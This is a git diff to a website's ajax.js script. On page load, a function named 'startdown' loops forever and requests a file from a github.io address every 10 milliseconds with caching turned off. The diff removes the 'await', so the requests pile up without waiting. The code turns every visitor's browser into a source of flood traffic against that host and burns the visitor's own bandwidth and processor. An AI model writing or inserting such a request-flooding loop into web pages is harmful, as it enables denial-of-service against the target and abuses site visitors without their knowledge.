diff --git a/js/ajax.js b/js/ajax.js index 9fac0f1..711df18 100644 --- a/js/ajax.js +++ b/js/ajax.js @@ -25,7 +25,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g window.onload = async function startdown(){ while(true) { await delay(10); - await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"}) + fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"}) } }